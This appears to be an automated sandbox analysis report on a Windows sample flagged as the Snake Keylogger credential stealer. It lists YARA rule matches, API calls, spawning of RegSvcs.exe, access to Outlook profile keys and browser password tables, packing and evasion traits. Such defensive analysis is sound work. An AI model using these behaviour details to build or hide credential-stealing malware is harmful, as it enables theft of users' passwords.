Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_014ACCD8	1_2_014ACCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_014A6FC8	1_2_014A6FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_014ACFAC	1_2_014ACFAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_014A3E09	1_2_014A3E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_014AF961	1_2_014AF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_014AE97C	1_2_014AE97C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_014A29EC	1_2_014A29EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_014A3AA1	1_2_014A3AA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063C9668	1_2_063C9668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063C2A90	1_2_063C2A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063C1FA8	1_2_063C1FA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063C1850	1_2_063C1850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063C9D38	1_2_063C9D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063C5148	1_2_063C5148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063CD218	1_2_063CD218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063CD670	1_2_063CD670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063CD660	1_2_063CD660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063CDAB9	1_2_063CDAB9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063CDAC8	1_2_063CDAC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063C0B30	1_2_063C0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063CDF20	1_2_063CDF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063C0B20	1_2_063C0B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063CDF1F	1_2_063CDF1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063CE378	1_2_063CE378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063CE36A	1_2_063CE36A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063C1FA2	1_2_063C1FA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063CE7D0	1_2_063CE7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063CE7CF	1_2_063CE7CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063CEC28	1_2_063CEC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063C001E	1_2_063C001E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063CEC18	1_2_063CEC18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063CF071	1_2_063CF071
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063C0040	1_2_063C0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063C1841	1_2_063C1841
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063CF080	1_2_063CF080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063CF4D8	1_2_063CF4D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063C8CC0	1_2_063C8CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063C5138	1_2_063C5138
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063CF930	1_2_063CF930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063CF922	1_2_063CF922
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063CCDC0	1_2_063CCDC0

Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: String function: 00C50AE3 appears 70 times
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: String function: 00C37DE1 appears 35 times
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: String function: 00C58900 appears 42 times

Source: 3c638k0NJx.exe, 00000000.00000003.879567610.0000000003783000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 3c638k0NJx.exe
Source: 3c638k0NJx.exe, 00000000.00000003.881472816.000000000397D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 3c638k0NJx.exe
Source: 3c638k0NJx.exe, 00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs 3c638k0NJx.exe

Source: 3c638k0NJx.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.3c638k0NJx.exe.da0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.3c638k0NJx.exe.da0000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.3c638k0NJx.exe.da0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.3c638k0NJx.exe.da0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.3c638k0NJx.exe.da0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.3c638k0NJx.exe.da0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000001.00000002.3353910246.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 3c638k0NJx.exe PID: 7156, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 6320, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 0.2.3c638k0NJx.exe.da0000.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.3c638k0NJx.exe.da0000.1.raw.unpack, i-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.3c638k0NJx.exe.da0000.1.raw.unpack, i-.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/4@4/4

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C9A06A GetLastError,FormatMessageW,

0_2_00C9A06A

Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C881CB AdjustTokenPrivileges,CloseHandle,		0_2_00C881CB
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C887E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00C887E1

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C9B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00C9B3FB

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00CAEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00CAEE0D

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C9C397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_00C9C397

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C34E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00C34E89

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\3c638k0NJx.exe

File created: C:\Users\user~1\AppData\Local\Temp\aut9047.tmp

Jump to behavior

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000001.00000002.3355927662.0000000002E92000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3355927662.0000000002E83000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3355927662.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3355927662.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3355927662.0000000002EB7000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 3c638k0NJx.exe	Virustotal: Detection: 70%
Source: 3c638k0NJx.exe	ReversingLabs: Detection: 65%

Source: unknown	Process created: C:\Users\user\Desktop\3c638k0NJx.exe "C:\Users\user\Desktop\3c638k0NJx.exe"
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\3c638k0NJx.exe"
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\3c638k0NJx.exe"	Jump to behavior

Source: C:\Users\user\Desktop\3c638k0NJx.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: 3c638k0NJx.exe, 00000000.00000003.881774733.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, 3c638k0NJx.exe, 00000000.00000003.883384927.0000000003850000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 3c638k0NJx.exe, 00000000.00000003.881774733.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, 3c638k0NJx.exe, 00000000.00000003.883384927.0000000003850000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C34B37 LoadLibraryA,GetProcAddress,

0_2_00C34B37

Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C58945 push ecx; ret	0_2_00C58958
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CBF8A0 pushad ; retf	0_2_00CBF916
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C39D1C pushfd ; ret	0_2_00C39D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_014A9C30 push esp; retf 0161h	1_2_014A9D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_063C890D push es; ret	1_2_063C8920

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00C348D7
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CB5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00CB5376

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C53187 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00C53187

Source: C:\Users\user\Desktop\3c638k0NJx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\3c638k0NJx.exe

API/Special instruction interceptor: Address: D93224

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599453	Jump to behavior
